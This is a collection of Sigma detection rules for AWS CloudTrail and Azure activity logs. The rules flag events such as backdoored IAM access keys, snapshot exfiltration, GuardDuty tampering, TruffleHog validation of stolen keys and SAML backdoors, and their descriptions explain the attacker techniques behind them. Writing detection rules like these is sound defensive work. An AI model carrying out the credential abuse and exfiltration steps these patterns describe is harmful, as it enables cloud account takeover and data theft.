eventSource: elasticfilesystem.amazonaws.com
eventName: DeleteMountTarget
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/cloud/aws/cloudtrail/aws_eks_cluster_created_or_deleted.yml
================================================
title: AWS EKS Cluster Created or Deleted
id: 33d50d03-20ec-4b74-a74e-1e65a38af1c0
status: test
description: Identifies when an EKS cluster is created or deleted.
references:
- https://any-api.com/amazonaws_com/eks/docs/API_Description
author: Austin Songer
date: 2021-08-16
modified: 2022-10-09
tags:
- attack.impact
- attack.t1485
logsource:
product: aws
service: cloudtrail
detection:
selection:
eventSource: eks.amazonaws.com
eventName:
- CreateCluster
- DeleteCluster
condition: selection
falsepositives:
- EKS Cluster being created or deleted may be performed by a system administrator.
- Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
- EKS Cluster created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
level: low
================================================
FILE: rules/cloud/aws/cloudtrail/aws_elasticache_security_group_created.yml
================================================
title: AWS ElastiCache Security Group Created
id: 4ae68615-866f-4304-b24b-ba048dfa5ca7
status: test
description: Detects when an ElastiCache security group has been created.
references:
- https://github.com/elastic/detection-rules/blob/598f3d7e0a63221c0703ad9a0ea7e22e7bc5961e/rules/integrations/aws/persistence_elasticache_security_group_creation.toml
author: Austin Songer @austinsonger
date: 2021-07-24
modified: 2022-10-09
tags:
- attack.persistence
- attack.t1136
- attack.t1136.003
logsource:
product: aws
service: cloudtrail
detection:
selection:
eventSource: elasticache.amazonaws.com
eventName: 'CreateCacheSecurityGroup'
condition: selection
falsepositives:
- A ElastiCache security group may be created by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Security group creations from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
level: low
================================================
FILE: rules/cloud/aws/cloudtrail/aws_elasticache_security_group_modified_or_deleted.yml
================================================
title: AWS ElastiCache Security Group Modified or Deleted
id: 7c797da2-9cf2-4523-ba64-33b06339f0cc
status: test
description: Identifies when an ElastiCache security group has been modified or deleted.
references:
- https://github.com/elastic/detection-rules/blob/7d5efd68603f42be5e125b5a6a503b2ef3ac0f4e/rules/integrations/aws/impact_elasticache_security_group_modified_or_deleted.toml
author: Austin Songer @austinsonger
date: 2021-07-24
modified: 2022-10-09
tags:
- attack.impact
- attack.t1531
logsource:
product: aws
service: cloudtrail
detection:
selection:
eventSource: elasticache.amazonaws.com
eventName:
- 'DeleteCacheSecurityGroup'
- 'AuthorizeCacheSecurityGroupIngress'
- 'RevokeCacheSecurityGroupIngress'
- 'AuthorizeCacheSecurityGroupEgress'
- 'RevokeCacheSecurityGroupEgress'
condition: selection
falsepositives:
- A ElastiCache security group deletion may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Security Group deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
level: low
================================================
FILE: rules/cloud/aws/cloudtrail/aws_enum_buckets.yml
================================================
title: Potential Bucket Enumeration on AWS
id: f305fd62-beca-47da-ad95-7690a0620084
related:
- id: 4723218f-2048-41f6-bcb0-417f2d784f61
type: similar
status: test
description: Looks for potential enumeration of AWS buckets via ListBuckets.
references:
- https://github.com/Lifka/hacking-resources/blob/c2ae355d381bd0c9f0b32c4ead049f44e5b1573f/cloud-hacking-cheat-sheets.md
- https://jamesonhacking.blogspot.com/2020/12/pivoting-to-private-aws-s3-buckets.html
- https://securitycafe.ro/2022/12/14/aws-enumeration-part-ii-practical-enumeration/
author: Christopher Peacock @securepeacock, SCYTHE @scythe_io
date: 2023-01-06
modified: 2024-07-10
tags:
- attack.discovery
- attack.t1580
- attack.t1619
logsource:
product: aws
service: cloudtrail
detection:
selection:
eventSource: 's3.amazonaws.com'
eventName: 'ListBuckets'
filter:
userIdentity.type: 'AssumedRole'
condition: selection and not filter
falsepositives:
- Administrators listing buckets, it may be necessary to filter out users who commonly conduct this activity.
level: low
================================================
FILE: rules/cloud/aws/cloudtrail/aws_guardduty_disruption.yml
================================================
title: AWS GuardDuty Important Change
id: 6e61ee20-ce00-4f8d-8aee-bedd8216f7e3
status: test
description: Detects updates of the GuardDuty list of trusted IPs, perhaps to disable security alerts against malicious IPs.
references:
- https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/guardduty__whitelist_ip/main.py#L9
author: faloker
date: 2020-02-11
modified: 2022-10-09
tags:
- attack.defense-evasion
- attack.t1562.001
logsource:
product: aws
service: cloudtrail
detection:
selection_source:
eventSource: guardduty.amazonaws.com
eventName: CreateIPSet
condition: selection_source
falsepositives:
- Valid change in the GuardDuty (e.g. to ignore internal scanners)
level: high
================================================
FILE: rules/cloud/aws/cloudtrail/aws_iam_backdoor_users_keys.yml
================================================
title: AWS IAM Backdoor Users Keys
id: 0a5177f4-6ca9-44c2-aacf-d3f3d8b6e4d2
status: test
description: |
Detects AWS API key creation for a user by another user.
Backdoored users can be used to obtain persistence in the AWS environment.
Also with this alert, you can detect a flow of AWS keys in your org.
references:
- https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam__backdoor_users_keys/main.py
author: faloker
date: 2020-02-12
modified: 2022-10-09
tags:
- attack.persistence
- attack.privilege-escalation
- attack.t1098
logsource:
product: aws
service: cloudtrail
detection:
selection_source:
eventSource: iam.amazonaws.com
eventName: CreateAccessKey
filter:
userIdentity.arn|contains: responseElements.accessKey.userName
condition: selection_source and not filter
falsepositives:
- Adding user keys to their own accounts (the filter cannot cover all possible variants of user naming)
- AWS API keys legitimate exchange workflows
level: medium
================================================
FILE: rules/cloud/aws/cloudtrail/aws_iam_s3browser_loginprofile_creation.yml
================================================
title: AWS IAM S3Browser LoginProfile Creation
id: db014773-b1d3-46bd-ba26-133337c0ffee
status: test
description: Detects S3 Browser utility performing reconnaissance looking for existing IAM Users without a LoginProfile defined then (when found) creating a LoginProfile.
references:
- https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor
author: daniel.bohannon@permiso.io (@danielhbohannon)
date: 2023-05-17
tags:
- attack.execution
- attack.persistence
- attack.defense-evasion
- attack.initial-access
- attack.privilege-escalation
- attack.t1059.009
- attack.t1078.004
logsource:
product: aws
service: cloudtrail
detection:
selection:
eventSource: 'iam.amazonaws.com'
eventName:
- 'GetLoginProfile'
- 'CreateLoginProfile'
userAgent|contains: 'S3 Browser'
condition: selection
falsepositives:
- Valid usage of S3 Browser for IAM LoginProfile listing and/or creation
level: high
================================================
FILE: rules/cloud/aws/cloudtrail/aws_iam_s3browser_templated_s3_bucket_policy_creation.yml
================================================
title: AWS IAM S3Browser Templated S3 Bucket Policy Creation
id: db014773-7375-4f4e-b83b-133337c0ffee
status: test
description: Detects S3 browser utility creating Inline IAM policy containing default S3 bucket name placeholder value of "".
references:
- https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor
author: daniel.bohannon@permiso.io (@danielhbohannon)
date: 2023-05-17
tags:
- attack.execution
- attack.t1059.009
- attack.persistence
- attack.defense-evasion
- attack.initial-access
- attack.privilege-escalation
- attack.t1078.004
logsource:
product: aws
service: cloudtrail
detection:
selection:
eventSource: iam.amazonaws.com
eventName: PutUserPolicy
userAgent|contains: 'S3 Browser'
requestParameters|contains|all:
- '"arn:aws:s3:::/*"'
- '"s3:GetObject"'
- '"Allow"'
condition: selection
falsepositives:
- Valid usage of S3 browser with accidental creation of default Inline IAM policy without changing default S3 bucket name placeholder value
level: high
================================================
FILE: rules/cloud/aws/cloudtrail/aws_iam_s3browser_user_or_accesskey_creation.yml
================================================
title: AWS IAM S3Browser User or AccessKey Creation
id: db014773-d9d9-4792-91e5-133337c0ffee
status: test
description: Detects S3 Browser utility creating IAM User or AccessKey.
references:
- https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor
author: daniel.bohannon@permiso.io (@danielhbohannon)
date: 2023-05-17
tags:
- attack.privilege-escalation
- attack.execution
- attack.persistence
- attack.defense-evasion
- attack.initial-access
- attack.t1059.009
- attack.t1078.004
logsource:
product: aws
service: cloudtrail
detection:
selection:
eventSource: 'iam.amazonaws.com'
eventName:
- 'CreateUser'
- 'CreateAccessKey'
userAgent|contains: 'S3 Browser'
condition: selection
falsepositives:
- Valid usage of S3 Browser for IAM User and/or AccessKey creation
level: high
================================================
FILE: rules/cloud/aws/cloudtrail/aws_kms_import_key_material.yml
================================================
title: AWS KMS Imported Key Material Usage
id: 1279262f-1464-422f-ac0d-5b545320c526
status: experimental
description: |
Detects the import or deletion of key material in AWS KMS, which can be used as part of ransomware attacks. This activity is uncommon and provides a high certainty signal.
references:
- https://www.chrisfarris.com/post/effective-aws-ransomware/
- https://docs.aws.amazon.com/kms/latest/developerguide/ct-importkeymaterial.html
- https://docs.aws.amazon.com/kms/latest/developerguide/ct-deleteimportedkeymaterial.html
author: toopricey
date: 2025-10-18
tags:
- attack.impact
- attack.t1486
- attack.resource-development
- attack.t1608.003
logsource:
product: aws
service: cloudtrail
detection:
selection:
eventSource: 'kms.amazonaws.com'
eventName:
- 'ImportKeyMaterial'
- 'DeleteImportedKeyMaterial'
condition: selection
falsepositives:
- Legitimate use cases for imported key material are rare, but may include, Organizations with hybrid cloud architectures that import external key material for compliance requirements.
- Development or testing environments that simulate external key management scenarios. Even in these cases, such activity is typically infrequent and should not add significant noise.
level: high
================================================
FILE: rules/cloud/aws/cloudtrail/aws_lambda_function_url.yml
================================================
title: New AWS Lambda Function URL Configuration Created
id: ec541962-c05a-4420-b9ea-84de072d18f4
status: experimental
description: |
Detects when a user creates a Lambda function URL configuration, which could be used to expose the function to the internet and potentially allow unauthorized access to the function's IAM role for AWS API calls.
This could give an adversary access to the privileges associated with the Lambda service role that is attached to that function.
references:
- https://docs.aws.amazon.com/lambda/latest/dg/API_CreateFunctionUrlConfig.html
- https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc
- https://www.wiz.io/blog/how-to-set-secure-defaults-on-aws
author: Ivan Saakov
date: 2024-12-19
tags:
- attack.initial-access
- attack.privilege-escalation
logsource:
product: aws
service: cloudtrail
detection:
selection:
eventSource: lambda.amazonaws.com
eventName: 'CreateFunctionUrlConfig'
condition: selection
falsepositives:
- Creating a Lambda function URL configuration may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
- Creating a Lambda function URL configuration from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
level: medium
================================================
FILE: rules/cloud/aws/cloudtrail/aws_new_lambda_layer_attached.yml
================================================
title: AWS New Lambda Layer Attached
id: 97fbabf8-8e1b-47a2-b7d5-a418d2b95e3d
status: test
description: |
Detects when a user attached a Lambda layer to an existing Lambda function.
A malicious Lambda layer could execute arbitrary code in the context of the function's IAM role.
This would give an adversary access to resources that the function has access to.
references:
- https://docs.aws.amazon.com/lambda/latest/dg/API_UpdateFunctionConfiguration.html
- https://github.com/clearvector/lambda-spy
author: Austin Songer
date: 2021-09-23
modified: 2025-03-17
tags:
- attack.privilege-escalation
logsource:
product: aws
service: cloudtrail
detection:
selection:
eventSource: lambda.amazonaws.com
eventName|startswith: 'UpdateFunctionConfiguration'
requestParameters.layers|contains: '*'
condition: selection
falsepositives:
- Lambda Layer being attached may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
- Lambda Layer being attached from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
level: low
================================================
FILE: rules/cloud/aws/cloudtrail/aws_passed_role_to_glue_development_endpoint.yml
================================================
title: AWS Glue Development Endpoint Activity
id: 4990c2e3-f4b8-45e3-bc3c-30b14ff0ed26
status: test
description: Detects possible suspicious glue development endpoint activity.
references:
- https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
- https://docs.aws.amazon.com/glue/latest/webapi/API_CreateDevEndpoint.html
author: Austin Songer @austinsonger
date: 2021-10-03
modified: 2022-12-18
tags:
- attack.privilege-escalation
logsource:
product: aws
service: cloudtrail
detection:
selection:
eventSource: 'glue.amazonaws.com'
eventName:
- 'CreateDevEndpoint'
- 'DeleteDevEndpoint'
- 'UpdateDevEndpoint'
condition: selection
falsepositives:
- Glue Development Endpoint Activity may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
- If known behavior is causing false positives, it can be exempted from the rule.
level: low
================================================
FILE: rules/cloud/aws/cloudtrail/aws_rds_change_master_password.yml
================================================
title: AWS RDS Master Password Change
id: 8a63cdd4-6207-414a-85bc-7e032bd3c1a2
status: test
description: Detects the change of database master password. It may be a part of data exfiltration.
references:
- https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/rds__explore_snapshots/main.py
author: faloker
date: 2020-02-12
modified: 2022-10-05
tags:
- attack.exfiltration
- attack.t1020
logsource:
product: aws
service: cloudtrail
detection:
selection_source:
eventSource: rds.amazonaws.com
responseElements.pendingModifiedValues.masterUserPassword|contains: '*'
eventName: ModifyDBInstance
condition: selection_source
falsepositives:
- Benign changes to a db instance
level: medium
================================================
FILE: rules/cloud/aws/cloudtrail/aws_rds_dbcluster_actions.yml
================================================
title: Modification or Deletion of an AWS RDS Cluster
id: 457cc9ac-d8e6-4d1d-8c0e-251d0f11a74c
status: experimental
description: Detects modifications to an RDS cluster or its deletion, which may indicate potential data exfiltration attempts, unauthorized access, or exposure of sensitive information.
references:
- https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_ModifyDBCluster.html
- https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DeleteDBCluster.html
- https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc#rds-modifydbinstance
author: Ivan Saakov
date: 2024-12-06
tags:
- attack.exfiltration
- attack.t1020
logsource:
product: aws
service: cloudtrail
detection:
selection:
eventSource: rds.amazonaws.com
eventName:
- ModifyDBCluster
- DeleteDBCluster
condition: selection
falsepositives:
- Verify if the modification or deletion was performed by an authorized administrator.
- Confirm if the modification or deletion was part of a planned change or maintenance activity.
level: high
================================================
FILE: rules/cloud/aws/cloudtrail/aws_rds_public_db_restore.yml
================================================
title: Restore Public AWS RDS Instance
id: c3f265c7-ff03-4056-8ab2-d486227b4599
status: test
description: Detects the recovery of a new public database instance from a snapshot. It may be a part of data exfiltration.
references:
- https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/rds__explore_snapshots/main.py
author: faloker
date: 2020-02-12
modified: 2022-10-09
tags:
- attack.exfiltration
- attack.t1020
logsource:
product: aws
service: cloudtrail
detection:
selection_source:
eventSource: rds.amazonaws.com
responseElements.publiclyAccessible: 'true'
eventName: RestoreDBInstanceFromDBSnapshot
condition: selection_source
falsepositives:
- Unknown
level: high
================================================
FILE: rules/cloud/aws/cloudtrail/aws_root_account_usage.yml
================================================
title: AWS Root Credentials
id: 8ad1600d-e9dc-4251-b0ee-a65268f29add
status: test
description: Detects AWS root account usage
references:
- https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html
author: vitaliy0x1
date: 2020-01-21
modified: 2022-10-09
tags:
- attack.privilege-escalation
- attack.defense-evasion
- attack.initial-access
- attack.persistence
- attack.t1078.004
logsource:
product: aws
service: cloudtrail
detection:
selection_usertype:
userIdentity.type: Root
selection_eventtype:
eventType: AwsServiceEvent
condition: selection_usertype and not selection_eventtype
falsepositives:
- AWS Tasks That Require AWS Account Root User Credentials https://docs.aws.amazon.com/general/latest/gr/aws_tasks-that-require-root.html
level: medium
================================================
FILE: rules/cloud/aws/cloudtrail/aws_route_53_domain_transferred_lock_disabled.yml
================================================
title: AWS Route 53 Domain Transfer Lock Disabled
id: 3940b5f1-3f46-44aa-b746-ebe615b879e0
status: test
description: Detects when a transfer lock was removed from a Route 53 domain. It is recommended to refrain from performing this action unless intending to transfer the domain to a different registrar.
references:
- https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml
- https://docs.aws.amazon.com/Route53/latest/APIReference/API_Operations_Amazon_Route_53.html
- https://docs.aws.amazon.com/Route53/latest/APIReference/API_domains_DisableDomainTransferLock.html
author: Elastic, Austin Songer @austinsonger
date: 2021-07-22
modified: 2022-10-09
tags:
- attack.persistence
- attack.privilege-escalation
- attack.credential-access
- attack.t1098
logsource:
product: aws
service: cloudtrail
detection:
selection:
eventSource: route53.amazonaws.com
eventName: DisableDomainTransferLock
condition: selection
falsepositives:
- A domain transfer lock may be disabled by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Activity from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
level: low
================================================
FILE: rules/cloud/aws/cloudtrail/aws_route_53_domain_transferred_to_another_account.yml
================================================
title: AWS Route 53 Domain Transferred to Another Account
id: b056de1a-6e6e-4e40-a67e-97c9808cf41b
status: test
description: Detects when a request has been made to transfer a Route 53 domain to another AWS account.
references:
- https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transferred_to_another_account.toml
author: Elastic, Austin Songer @austinsonger
date: 2021-07-22
modified: 2022-10-09
tags:
- attack.persistence
- attack.credential-access
- attack.privilege-escalation
- attack.t1098
logsource:
product: aws
service: cloudtrail
detection:
selection:
eventSource: route53.amazonaws.com
eventName: TransferDomainToAnotherAwsAccount
condition: selection
falsepositives:
- A domain may be transferred to another AWS account by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Domain transfers from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
level: low
================================================
FILE: rules/cloud/aws/cloudtrail/aws_s3_data_management_tampering.yml
================================================
title: AWS S3 Data Management Tampering
id: 78b3756a-7804-4ef7-8555-7b9024a02e2d
status: test
description: Detects when a user tampers with S3 data management in Amazon Web Services.
references:
- https://github.com/elastic/detection-rules/pull/1145/files
- https://docs.aws.amazon.com/AmazonS3/latest/API/API_Operations.html
- https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketLogging.html
- https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketWebsite.html
- https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketEncryption.html
- https://docs.aws.amazon.com/AmazonS3/latest/userguide/setting-repl-config-perm-overview.html
- https://docs.aws.amazon.com/AmazonS3/latest/API/API_RestoreObject.html
author: Austin Songer @austinsonger
date: 2021-07-24
modified: 2022-10-09
tags:
- attack.exfiltration
- attack.t1537
logsource:
product: aws
service: cloudtrail
detection:
selection:
eventSource: s3.amazonaws.com
eventName:
- PutBucketLogging
- PutBucketWebsite
- PutEncryptionConfiguration
- PutLifecycleConfiguration
- PutReplicationConfiguration
- ReplicateObject
- RestoreObject
condition: selection
falsepositives:
- A S3 configuration change may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. S3 configuration change from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
level: low
================================================
FILE: rules/cloud/aws/cloudtrail/aws_securityhub_finding_evasion.yml
================================================
title: AWS SecurityHub Findings Evasion
id: a607e1fe-74bf-4440-a3ec-b059b9103157
status: stable
description: Detects the modification of the findings on SecurityHub.
references:
- https://docs.aws.amazon.com/cli/latest/reference/securityhub/
author: Sittikorn S
date: 2021-06-28
tags:
- attack.defense-evasion
- attack.t1562
logsource:
product: aws
service: cloudtrail
detection:
selection:
eventSource: securityhub.amazonaws.com
eventName:
- 'BatchUpdateFindings'
- 'DeleteInsight'
- 'UpdateFindings'
- 'UpdateInsight'
condition: selection
falsepositives:
- System or Network administrator behaviors
- DEV, UAT, SAT environment. You should apply this rule with PROD environment only.
level: high
================================================
FILE: rules/cloud/aws/cloudtrail/aws_snapshot_backup_exfiltration.yml
================================================
title: AWS Snapshot Backup Exfiltration
id: abae8fec-57bd-4f87-aff6-6e3db989843d
status: test
description: Detects the modification of an EC2 snapshot's permissions to enable access from another account
references:
- https://www.justice.gov/file/1080281/download
author: Darin Smith
date: 2021-05-17
modified: 2021-08-19
tags:
- attack.exfiltration
- attack.t1537
logsource:
product: aws
service: cloudtrail
detection:
selection_source:
eventSource: ec2.amazonaws.com
eventName: ModifySnapshotAttribute
condition: selection_source
falsepositives:
- Valid change to a snapshot's permissions
level: medium
================================================
FILE: rules/cloud/aws/cloudtrail/aws_sso_idp_change.yml
================================================
title: AWS Identity Center Identity Provider Change
id: d3adb3ef-b7e7-4003-9092-1924c797db35
status: test
description: |
Detects a change in the AWS Identity Center (FKA AWS SSO) identity provider.
A change in identity provider allows an attacker to establish persistent access or escalate privileges via user impersonation.
references:
- https://docs.aws.amazon.com/singlesignon/latest/userguide/app-enablement.html
- https://docs.aws.amazon.com/singlesignon/latest/userguide/sso-info-in-cloudtrail.html
- https://docs.aws.amazon.com/service-authorization/latest/reference/list_awsiamidentitycentersuccessortoawssinglesign-on.html
author: Michael McIntyre @wtfender
date: 2023-09-27
tags:
- attack.persistence
- attack.credential-access
- attack.defense-evasion
- attack.t1556
logsource:
product: aws
service: cloudtrail
detection:
selection:
eventSource:
- 'sso-directory.amazonaws.com'
- 'sso.amazonaws.com'
eventName:
- 'AssociateDirectory'
- 'DisableExternalIdPConfigurationForDirectory'
- 'DisassociateDirectory'
- 'EnableExternalIdPConfigurationForDirectory'
condition: selection
falsepositives:
- Authorized changes to the AWS account's identity provider
level: high
================================================
FILE: rules/cloud/aws/cloudtrail/aws_sts_assumerole_misuse.yml
================================================
title: AWS STS AssumeRole Misuse
id: 905d389b-b853-46d0-9d3d-dea0d3a3cd49
status: test
description: Identifies the suspicious use of AssumeRole. Attackers could move laterally and escalate privileges.
references:
- https://github.com/elastic/detection-rules/pull/1214
- https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRole.html
author: Austin Songer @austinsonger
date: 2021-07-24
modified: 2022-10-09
tags:
- attack.lateral-movement
- attack.privilege-escalation
- attack.defense-evasion
- attack.t1548
- attack.t1550
- attack.t1550.001
logsource:
product: aws
service: cloudtrail
detection:
selection:
userIdentity.type: AssumedRole
userIdentity.sessionContext.sessionIssuer.type: Role
condition: selection
falsepositives:
- AssumeRole may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
- AssumeRole from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
- Automated processes that uses Terraform may lead to false positives.
level: low
================================================
FILE: rules/cloud/aws/cloudtrail/aws_sts_getcalleridentity_trufflehog.yml
================================================
title: AWS STS GetCallerIdentity Enumeration Via TruffleHog
id: 9b1b8e9b-0a5d-4af1-9d2f-4c4b6e7c2c9d
status: experimental
description: |
Detects the use of TruffleHog for AWS credential validation by identifying GetCallerIdentity API calls where the userAgent indicates TruffleHog.
Threat actors leverage TruffleHog to enumerate and validate exposed AWS keys.
Successful exploitation allows threat actors to confirm the validity of compromised AWS credentials, facilitating further unauthorized access and actions within the AWS environment.
references:
- https://www.rapid7.com/blog/post/tr-crimson-collective-a-new-threat-group-observed-operating-in-the-cloud/
- https://docs.aws.amazon.com/STS/latest/APIReference/API_GetCallerIdentity.html
- https://github.com/trufflesecurity/trufflehog
author: Adan Alvarez @adanalvarez
date: 2025-10-12
tags:
- attack.discovery
- attack.t1087.004
logsource:
product: aws
service: cloudtrail
detection:
selection:
eventSource: 'sts.amazonaws.com'
eventName: 'GetCallerIdentity'
userAgent|contains: 'TruffleHog'
condition: selection
falsepositives:
- Legitimate internal security scanning or key validation that intentionally uses TruffleHog. Authorize and filter known scanner roles, IP ranges, or assumed roles as needed.
level: medium
================================================
FILE: rules/cloud/aws/cloudtrail/aws_sts_getsessiontoken_misuse.yml
================================================
title: AWS STS GetSessionToken Misuse
id: b45ab1d2-712f-4f01-a751-df3826969807
status: test
description: Identifies the suspicious use of GetSessionToken. Tokens could be created and used by attackers to move laterally and escalate privileges.
references:
- https://github.com/elastic/detection-rules/pull/1213
- https://docs.aws.amazon.com/STS/latest/APIReference/API_GetSessionToken.html
author: Austin Songer @austinsonger
date: 2021-07-24
modified: 2022-10-09
tags:
- attack.lateral-movement
- attack.privilege-escalation
- attack.defense-evasion
- attack.t1548
- attack.t1550
- attack.t1550.001
logsource:
product: aws
service: cloudtrail
detection:
selection:
eventSource: sts.amazonaws.com
eventName: GetSessionToken
userIdentity.type: IAMUser
condition: selection
falsepositives:
- GetSessionToken may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. GetSessionToken from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
level: low
================================================
FILE: rules/cloud/aws/cloudtrail/aws_susp_saml_activity.yml
================================================
title: AWS Suspicious SAML Activity
id: f43f5d2f-3f2a-4cc8-b1af-81fde7dbaf0e
status: test
description: Identifies when suspicious SAML activity has occurred in AWS. An adversary could gain backdoor access via SAML.
references:
- https://docs.aws.amazon.com/IAM/latest/APIReference/API_UpdateSAMLProvider.html
- https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithSAML.html
author: Austin Songer
date: 2021-09-22
modified: 2022-12-18
tags:
- attack.defense-evasion
- attack.initial-access
- attack.lateral-movement
- attack.persistence
- attack.privilege-escalation
- attack.t1078
- attack.t1548
- attack.t1550
- attack.t1550.001
logsource:
product: aws
service: cloudtrail
detection:
selection_sts:
eventSource: 'sts.amazonaws.com'
eventName: 'AssumeRoleWithSAML'
selection_iam:
eventSource: 'iam.amazonaws.com'
eventName: 'UpdateSAMLProvider'
condition: 1 of selection_*
falsepositives:
- Automated processes that uses Terraform may lead to false positives.
- SAML Provider could be updated by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
- SAML Provider being updated from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
level: medium
================================================
FILE: rules/cloud/aws/cloudtrail/aws_update_login_profile.yml
================================================
title: AWS User Login Profile Was Modified
id: 055fb148-60f8-462d-ad16-26926ce050f1
status: test
description: |
Detects activity when someone is changing passwords on behalf of other users.
An attacker with the "iam:UpdateLoginProfile" permission on other users can change the password used to login to the AWS console on any user that already has a login profile setup.
references:
- https://github.com/RhinoSecurityLabs/AWS-IAM-Privilege-Escalation
author: toffeebr33k
date: 2021-08-09
modified: 2024-04-26
tags:
- attack.persistence
- attack.privilege-escalation
- attack.t1098
logsource:
product: aws
service: cloudtrail
detection:
selection:
eventSource: 'iam.amazonaws.com'
eventName: 'UpdateLoginProfile'
filter_main_user_identity:
userIdentity.arn|fieldref: requestParameters.userName
condition: selection and not 1 of filter_main_*
falsepositives:
- Legitimate user account administration
level: high
================================================
FILE: rules/cloud/azure/activity_logs/azure_aadhybridhealth_adfs_new_server.yml
================================================
title: Azure Active Directory Hybrid Health AD FS New Server
id: 288a39fc-4914-4831-9ada-270e9dc12cb4
status: test
description: |
This detection uses azureactivity logs (Administrative category) to identify the creation or update of a server instance in an Azure AD Hybrid health AD FS service.
A threat actor can create a new AD Health ADFS service and create a fake server instance to spoof AD FS signing logs. There is no need to compromise an on-prem AD FS server.
This can be done programmatically via HTTP requests to Azure.
references:
- https://o365blog.com/post/hybridhealthagent/
author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC
date: 2021-08-26
modified: 2023-10-11
tags:
- attack.defense-evasion
- attack.t1578
logsource:
product: azure
service: activitylogs
detection:
selection:
CategoryValue: 'Administrative'
ResourceProviderValue: 'Microsoft.ADHybridHealthService'
ResourceId|contains: 'AdFederationService'
OperationNameValue: 'Microsoft.ADHybridHealthService/services/servicemembers/action'
condition: selection
falsepositives:
- Legitimate AD FS servers added to an AAD Health AD FS service instance
level: medium
================================================
FILE: rules/cloud/azure/activity_logs/azure_aadhybridhealth_adfs_service_delete.yml
================================================
title: Azure Active Directory Hybrid Health AD FS Service Delete
id: 48739819-8230-4ee3-a8ea-e0289d1fb0ff
status: test
description: |
This detection uses azureactivity logs (Administrative category) to identify the deletion of an Azure AD Hybrid health AD FS service instance in a tenant.
A threat actor can create a new AD Health ADFS service and create a fake server to spoof AD FS signing logs.
The health AD FS service can then be deleted after it is not longer needed via HTTP requests to Azure.
references:
- https://o365blog.com/post/hybridhealthagent/
author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC
date: 2021-08-26
modified: 2023-10-11
tags:
- attack.defense-evasion
- attack.t1578.003
logsource:
product: azure
service: activitylogs
detection:
selection:
CategoryValue: 'Administrative'
ResourceProviderValue: 'Microsoft.ADHybridHealthService'
ResourceId|contains: 'AdFederationService'
OperationNameValue: 'Microsoft.ADHybridHealthService/services/delete'
condition: selection
falsepositives:
- Legitimate AAD Health AD FS service instances being deleted in a tenant
level: medium
================================================
FILE: rules/cloud/azure/activity_logs/azure_ad_user_added_to_admin_role.yml
================================================
title: User Added to an Administrator's Azure AD Role
id: ebbeb024-5b1d-4e16-9c0c-917f86c708a7
status: test
description: User Added to an Administrator's Azure AD Role
references:
- https://m365internals.com/2021/07/13/what-ive-learned-from-doing-a-year-of-cloud-forensics-in-azure-ad/
author: Raphaël CALVET, @MetallicHack
date: 2021-10-04
modified: 2022-10-09
tags:
- attack.initial-access
- attack.defense-evasion
- attack.persistence
- attack.privilege-escalation
- attack.t1098.003
- attack.t1078
logsource:
product: azure
service: activitylogs
detection:
selection:
Operation: 'Add member to role.'
Workload: 'AzureActiveDirectory'
ModifiedProperties{}.NewValue|endswith:
- 'Admins'
- 'Administrator'
condition: selection
falsepositives:
- PIM (Privileged Identity Management) generates this event each time 'eligible role' is enabled.
level: medium
================================================
